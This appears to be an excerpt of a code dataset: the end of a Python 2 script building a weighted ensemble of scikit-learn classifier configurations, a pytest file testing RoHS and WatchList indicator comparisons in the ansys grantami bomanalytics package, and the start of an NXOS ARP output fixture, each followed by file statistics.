{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.32162402484',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '12.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '41.8671636453',
'select_percentile_classification:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '690.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.3355464987',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'True',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '4.2700093411',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.294021193269',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '613.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.8000767552',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '7.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '661.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.23424202393',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '10.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '606.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.82743208676',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'True',
'extra_trees:criterion': 'gini',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '4.32850858484',
'extra_trees:min_samples_leaf': '3.0',
'extra_trees:min_samples_split': '5.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.118453703147',
'select_rates:mode': 'fpr',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1098.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'most_frequent',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '4.83031750621',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '15.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '3.52038352463',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '4.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'standard',
'select_rates:alpha': '0.441859738474',
'select_rates:mode': 'fpr',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '743.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.37406180812',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '17.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '531.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.38993786345',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '16.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'False',
'extra_trees:criterion': 'entropy',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '1.60284209578',
'extra_trees:min_samples_leaf': '4.0',
'extra_trees:min_samples_split': '10.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.486662334462',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'chi2'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1082.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.47545539014',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '15.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '985.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'most_frequent',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '3.87640604363',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'gradient_boosting',
'gradient_boosting:learning_rate': '0.236639577539',
'gradient_boosting:max_depth': '5.0',
'gradient_boosting:max_features': '1.94802938969',
'gradient_boosting:min_samples_leaf': '3.0',
'gradient_boosting:min_samples_split': '4.0',
'gradient_boosting:n_estimators': '100.0',
'gradient_boosting:subsample': '0.499388145134',
'imputation:strategy': 'most_frequent',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.078631031495',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.89271865035',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '9.0',
'random_forest:min_samples_split': '2.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '58.6633457276',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1299.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '4.38103060363',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '2.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1653.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.58731902957',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '8.0',
'random_forest:min_samples_split': '19.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
]
classifiers = []
predictions_valid = []
predictions_test = []
# Make predictions and weight them
for weight, configuration in zip(weights, configurations):
for param in configuration:
try:
configuration[param] = int(configuration[param])
except Exception:
try:
configuration[param] = float(configuration[param])
except Exception:
pass
classifier = ParamSklearnClassifier(configuration, 1)
classifiers.append(classifier)
try:
classifier.fit(X.copy(), y.copy())
predictions_valid.append(classifier.predict_proba(X_valid.copy()) * weight)
predictions_test.append(classifier.predict_proba(X_test.copy()) * weight)
except Exception as e:
print e
print configuration
# Output the predictions
for name, predictions in [('valid', predictions_valid),
('test', predictions_test)]:
predictions = np.array(predictions)
predictions = np.sum(predictions, axis=0)
predictions = predictions[:, 1].reshape((-1, 1))
filepath = os.path.join(output, '%s_%s_000.predict' % (dataset, name))
np.savetxt(filepath, predictions, delimiter=' ') | 40.640977 | 83 | 0.658758 | 2,500 | 21,621 | 5.4196 | 0.1132 | 0.175364 | 0.073068 | 0.071444 | 0.825301 | 0.816223 | 0.814304 | 0.810761 | 0.803307 | 0.801388 | 0 | 0.064002 | 0.172564 | 21,621 | 532 | 84 | 40.640977 | 0.693348 | 0.016049 | 0 | 0.745597 | 0 | 0 | 0.61137 | 0.32266 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.001957 | 0.015656 | null | null | 0.003914 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f5a17d53bbb1e7a65b5dbd0ec18944078fe899ff | 17,597 | py | Python | tests/test_bom_indicators.py | pyansys/grantami-bomanalytics | b9e4956b0a1cdd67d50953caa8257b6cff34a243 | [
"MIT"
] | 2 | 2022-02-18T19:53:20.000Z | 2022-02-18T21:35:27.000Z | tests/test_bom_indicators.py | pyansys/grantami-bomanalytics | b9e4956b0a1cdd67d50953caa8257b6cff34a243 | [
"MIT"
] | 46 | 2022-02-18T16:57:36.000Z | 2022-03-31T13:35:26.000Z | tests/test_bom_indicators.py | pyansys/grantami-bomanalytics | b9e4956b0a1cdd67d50953caa8257b6cff34a243 | [
"MIT"
] | 1 | 2022-02-22T18:24:03.000Z | 2022-02-22T18:24:03.000Z | import pytest
import random
from ansys.grantami.bomanalytics import indicators
from ansys.grantami.bomanalytics_openapi import CommonIndicatorDefinition
def create_rohs_indicator(ignore_exemptions) -> indicators.RoHSIndicator:
return create_indicator(indicators.RoHSIndicator, ignore_exemptions=ignore_exemptions)
def create_watchlist_indicator(ignore_process_chemicals) -> indicators.WatchListIndicator:
return create_indicator(indicators.WatchListIndicator, ignore_process_chemicals=ignore_process_chemicals)
def create_indicator(indicator, **kwargs) -> indicators._Indicator:
return indicator(
name="TestIndicator",
legislation_names=["Test legislation 1, Test legislation 2"],
default_threshold_percentage=5,
**kwargs,
)
def get_random_flag(flag_enum):
number_of_flags = len(flag_enum)
flag = flag_enum(random.randint(2, number_of_flags - 1))
return flag
def get_high_flag(flag_enum):
return flag_enum(len(flag_enum))
def get_low_flag(flag_enum):
return flag_enum(1)
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestFlagComparison:
def test_flag_greater_than(self, indicator):
high_flag = get_high_flag(indicator.available_flags)
middle_flag = get_random_flag(indicator.available_flags)
low_flag = get_low_flag(indicator.available_flags)
assert high_flag > middle_flag > low_flag
def test_flag_greater_than_equal_to(self, indicator):
flag = get_random_flag(indicator.available_flags)
assert flag >= flag >= get_low_flag(indicator.available_flags)
def test_flag_less_than(self, indicator):
high_flag = get_high_flag(indicator.available_flags)
middle_flag = get_random_flag(indicator.available_flags)
low_flag = get_low_flag(indicator.available_flags)
assert low_flag < middle_flag < high_flag
def test_flag_less_than_equal_to(self, indicator):
flag = get_random_flag(indicator.available_flags)
assert flag <= flag <= get_high_flag(indicator.available_flags)
def test_flag_equal(self, indicator):
flag = get_random_flag(indicator.available_flags)
assert flag == flag
assert not flag != flag
def test_flag_identity(self, indicator):
flag = get_random_flag(indicator.available_flags)
assert flag is flag
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestIndicators:
def test_indicator_unknown_flag_key_error(self, indicator):
test_indicator = create_indicator(
indicator,
)
with pytest.raises(KeyError) as e:
test_indicator.flag = "Invalid Flag"
assert 'Unknown flag "Invalid Flag"' in str(e.value)
assert repr(test_indicator) in str(e.value)
def test_indicator_str_with_flag(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
assert str(test_indicator) == f"{test_indicator.name}, {str(test_indicator.flag.name)}"
def test_indicator_str_without_flag(self, indicator):
test_indicator = create_indicator(indicator)
assert str(test_indicator) == f"{test_indicator.name}"
def test_indicator_repr_with_flag(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
assert (
repr(test_indicator) == f"<{indicator.__name__}, name: {test_indicator.name},"
f" flag: {str(test_indicator.flag)}>"
)
def test_indicator_repr_without_flag(self, indicator):
test_indicator = create_indicator(indicator)
assert repr(test_indicator) == f"<{indicator.__name__}, name: {test_indicator.name}>"
class TestRohsIndicator:
test_indicator = create_rohs_indicator(ignore_exemptions=True)
def test_indicator_definition(self):
assert self.test_indicator.name == "TestIndicator"
assert self.test_indicator.legislation_names == ["Test legislation 1, Test legislation 2"]
assert self.test_indicator.default_threshold_percentage == 5
assert self.test_indicator._indicator_type == "Rohs"
assert self.test_indicator._ignore_exemptions is True
assert self.test_indicator.available_flags
assert not self.test_indicator.flag
def test_indicator_definition_property(self):
definition = self.test_indicator._definition
assert isinstance(definition, CommonIndicatorDefinition)
def_dict = definition.to_dict()
assert def_dict["name"] == self.test_indicator.name
assert def_dict["legislation_names"] == self.test_indicator.legislation_names
assert def_dict["default_threshold_percentage"] == self.test_indicator.default_threshold_percentage
assert def_dict["type"] == self.test_indicator._indicator_type
assert def_dict["ignore_exemptions"] == self.test_indicator._ignore_exemptions
assert def_dict["ignore_process_chemicals"] is None
class TestWatchListIndicator:
test_indicator = create_watchlist_indicator(ignore_process_chemicals=True)
def test_indicator_definition(self):
assert self.test_indicator.name == "TestIndicator"
assert self.test_indicator.legislation_names == ["Test legislation 1, Test legislation 2"]
assert self.test_indicator.default_threshold_percentage == 5
assert self.test_indicator._indicator_type == "WatchList"
assert self.test_indicator._ignore_process_chemicals is True
assert self.test_indicator.available_flags
assert not self.test_indicator.flag
def test_indicator_definition_property(self):
definition = self.test_indicator._definition
assert isinstance(definition, CommonIndicatorDefinition)
def_dict = definition.to_dict()
assert def_dict["name"] == self.test_indicator.name
assert def_dict["legislation_names"] == self.test_indicator.legislation_names
assert def_dict["default_threshold_percentage"] == self.test_indicator.default_threshold_percentage
assert def_dict["type"] == self.test_indicator._indicator_type
assert def_dict["ignore_exemptions"] is None
assert def_dict["ignore_process_chemicals"] == self.test_indicator._ignore_process_chemicals
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestIndicatorComparison:
@pytest.mark.parametrize("add_flag", [True, False])
def test_definition_comparison_value_error(self, indicator, add_flag):
test_indicator = create_indicator(indicator)
if add_flag:
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
other_indicator = create_indicator(indicator)
with pytest.raises(ValueError) as e:
_ = test_indicator == other_indicator
assert test_indicator.name in str(e.value)
assert "has no flag" in str(e.value)
with pytest.raises(ValueError) as e:
_ = test_indicator < other_indicator
assert test_indicator.name in str(e.value)
assert "has no flag" in str(e.value)
def test_less_than(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(test_indicator.available_flags).name
assert low_indicator < test_indicator
assert not low_indicator >= test_indicator
def test_greater_than(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
high_indicator = create_indicator(indicator)
high_indicator.flag = get_high_flag(test_indicator.available_flags).name
assert high_indicator > test_indicator
assert not high_indicator <= test_indicator
def test_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
same_indicator = create_indicator(indicator)
same_indicator.flag = test_indicator.flag.name
assert same_indicator == test_indicator
assert not same_indicator != test_indicator
def test_not_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_high_flag(test_indicator.available_flags).name
other_indicator = create_indicator(indicator)
other_indicator.flag = get_low_flag(test_indicator.available_flags).name
assert test_indicator != other_indicator
assert not test_indicator == other_indicator
def test_less_than_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
same_indicator = create_indicator(indicator)
same_indicator.flag = test_indicator.flag.name
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(test_indicator.available_flags).name
assert same_indicator <= test_indicator
assert low_indicator <= test_indicator
assert not same_indicator > test_indicator
assert not low_indicator > test_indicator
def test_greater_than_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
same_indicator = create_indicator(indicator)
same_indicator.flag = test_indicator.flag.name
high_indicator = create_indicator(indicator)
high_indicator.flag = get_high_flag(test_indicator.available_flags).name
assert same_indicator >= test_indicator
assert high_indicator >= test_indicator
assert not same_indicator < test_indicator
assert not high_indicator < test_indicator
@pytest.mark.parametrize(
"indicator, other_indicator",
[
(indicators.RoHSIndicator, indicators.WatchListIndicator),
(indicators.WatchListIndicator, indicators.RoHSIndicator),
],
)
def test_indicator_result_different_indicators_type_error(indicator, other_indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
other_test_indicator = create_indicator(other_indicator)
other_test_indicator.flag = get_random_flag(other_test_indicator.available_flags).name
with pytest.raises(TypeError) as e:
_ = other_test_indicator == test_indicator
assert str(indicator) in str(e.value)
assert str(other_indicator) in str(e.value)
with pytest.raises(TypeError) as e:
_ = other_test_indicator < test_indicator
assert str(indicator) in str(e.value)
assert str(other_indicator) in str(e.value)
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestCompareFlagWithIndicator:
def test_compare_with_definition_value_error(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
other_indicator = create_indicator(indicator)
with pytest.raises(ValueError) as e:
_ = test_indicator.flag == other_indicator
assert test_indicator.name in str(e.value)
assert "has no flag" in str(e.value)
with pytest.raises(ValueError) as e:
_ = test_indicator.flag < other_indicator
assert test_indicator.name in str(e.value)
assert "has no flag" in str(e.value)
def test_less_than(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
assert get_low_flag(test_indicator.available_flags) < test_indicator
assert not get_low_flag(test_indicator.available_flags) >= test_indicator
def test_greater_than(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
assert get_high_flag(test_indicator.available_flags) > test_indicator
assert not get_high_flag(test_indicator.available_flags) <= test_indicator
def test_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
assert test_indicator.flag == test_indicator
assert not test_indicator.flag != test_indicator
def test_not_equal_to(self, indicator):
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(low_indicator.available_flags).name
assert get_high_flag(low_indicator.available_flags) != low_indicator
assert not get_high_flag(low_indicator.available_flags) == low_indicator
def test_less_than_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(test_indicator.available_flags).name
assert test_indicator.flag <= test_indicator
assert get_low_flag(test_indicator.available_flags) <= test_indicator
assert not test_indicator.flag > test_indicator
assert not get_low_flag(test_indicator.available_flags) > test_indicator
def test_greater_than_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
high_indicator = create_indicator(indicator)
high_indicator.flag = get_high_flag(test_indicator.available_flags).name
assert test_indicator.flag >= test_indicator
assert get_high_flag(test_indicator.available_flags) >= test_indicator
assert not test_indicator.flag < test_indicator
assert not get_high_flag(test_indicator.available_flags) < test_indicator
@pytest.mark.parametrize("indicator", [(indicators.RoHSIndicator), (indicators.WatchListIndicator)])
class TestCompareIndicatorWithFlag:
def test_compare_with_definition_value_error(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
other_indicator = create_indicator(indicator)
with pytest.raises(ValueError) as e:
_ = other_indicator == test_indicator.flag
assert test_indicator.name in str(e.value)
assert "has no flag" in str(e.value)
with pytest.raises(ValueError) as e:
_ = other_indicator < test_indicator.flag
assert test_indicator.name in str(e.value)
assert "has no flag" in str(e.value)
def test_less_than(self, indicator):
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(low_indicator.available_flags).name
assert low_indicator < get_random_flag(low_indicator.available_flags)
assert not low_indicator >= get_random_flag(low_indicator.available_flags)
def test_greater_than(self, indicator):
high_indicator = create_indicator(indicator)
high_indicator.flag = get_high_flag(high_indicator.available_flags).name
assert high_indicator > get_random_flag(high_indicator.available_flags)
assert not high_indicator <= get_random_flag(high_indicator.available_flags)
def test_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
assert test_indicator == test_indicator.flag
assert not test_indicator != test_indicator.flag
def test_not_equal_to(self, indicator):
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(low_indicator.available_flags).name
assert low_indicator != get_high_flag(low_indicator.available_flags)
assert not low_indicator == get_high_flag(low_indicator.available_flags)
def test_less_than_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
low_indicator = create_indicator(indicator)
low_indicator.flag = get_low_flag(test_indicator.available_flags).name
assert test_indicator <= test_indicator.flag
assert low_indicator <= test_indicator.flag
assert not test_indicator > test_indicator.flag
assert not low_indicator > test_indicator.flag
def test_greater_than_equal_to(self, indicator):
test_indicator = create_indicator(indicator)
test_indicator.flag = get_random_flag(test_indicator.available_flags).name
high_indicator = create_indicator(indicator)
high_indicator.flag = get_high_flag(test_indicator.available_flags).name
assert test_indicator >= test_indicator.flag
assert high_indicator >= test_indicator.flag
assert not test_indicator < test_indicator.flag
assert not high_indicator < test_indicator.flag
| 43.449383 | 109 | 0.745013 | 2,120 | 17,597 | 5.818396 | 0.047642 | 0.214998 | 0.123064 | 0.112363 | 0.889015 | 0.854155 | 0.813458 | 0.800243 | 0.78638 | 0.715444 | 0 | 0.000834 | 0.182133 | 17,597 | 404 | 110 | 43.556931 | 0.85624 | 0 | 0 | 0.52459 | 0 | 0 | 0.042564 | 0.016651 | 0 | 0 | 0 | 0 | 0.344262 | 1 | 0.140984 | false | 0 | 0.013115 | 0.016393 | 0.203279 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1971a5acb8a048bf8d785850c122ed80b1174205 | 35,807 | py | Python | pkgs/ops-pkg/src/genie/libs/ops/arp/nxos/tests/arp_output.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/ops-pkg/src/genie/libs/ops/arp/nxos/tests/arp_output.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/ops-pkg/src/genie/libs/ops/arp/nxos/tests/arp_output.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | '''
Arp Genie Ops Object Outputs for NXOS.
'''
class ArpOutput(object):
ShowIpArpDetailVrfAll = {
'interfaces': {
'Ethernet1/1': {
'ipv4': {
'neighbors': {
'10.1.3.5': {
'age': '-',
'ip': '10.1.3.5',
'link_layer_address': 'aaaa.bbbb.cccc',
'origin': 'static',
'physical_interface': 'Ethernet1/1'}
}
}
},
'Ethernet1/1.1': {
'ipv4': {
'neighbors': {
'192.168.4.2': {
'age': '00:01:53',
'ip': '192.168.4.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/1.1'}
}
}
},
'Ethernet1/1.2': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'age': '00:00:47',
'ip': '192.168.154.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/1.2'}
}
}
},
'Ethernet1/1.4': {
'ipv4': {
'neighbors': {
'192.168.106.2': {
'age': '00:08:42',
'ip': '192.168.106.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/1.4'}
}
}
},
'Ethernet1/2.1': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'age': '00:18:24',
'ip': '192.168.154.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/2.1'}
}
}
},
'Ethernet1/2.2': {
'ipv4': {
'neighbors': {
'192.168.51.2': {
'age': '00:05:21',
'ip': '192.168.51.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/2.2'}
}
}
},
'Ethernet1/2.4': {
'ipv4': {
'neighbors': {
'192.168.9.2': {
'age': '00:10:51',
'ip': '192.168.9.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/2.4'}
}
}
},
'Ethernet1/4.100': {
'ipv4': {
'neighbors': {
'10.51.1.101': {
'age': '00:01:28',
'ip': '10.51.1.101',
'link_layer_address': '0000.71c7.6e61',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/4.100'}
}
}
},
'Ethernet1/4.101': {
'ipv4': {
'neighbors': {
'10.154.1.101': {
'age': '00:01:28',
'ip': '10.154.1.101',
'link_layer_address': '0000.71c7.75c1',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/4.101'}
}
}
},
'Ethernet1/4.200': {
'ipv4': {
'neighbors': {
'10.76.1.101': {
'age': '00:01:28',
'ip': '10.76.1.101',
'link_layer_address': '0000.0068.ce6f',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/4.200'}
}
}
},
'mgmt0': {
'ipv4': {
'neighbors': {
'10.1.7.1': {
'age': '00:17:15',
'ip': '10.1.7.1',
'link_layer_address': '0012.7f57.ac80',
'origin': 'dynamic',
'physical_interface': 'mgmt0'},
'10.1.7.250': {
'age': '00:14:24',
'ip': '10.1.7.250',
'link_layer_address': '0050.5682.7915',
'origin': 'dynamic',
'physical_interface': 'mgmt0'},
'10.1.7.253': {
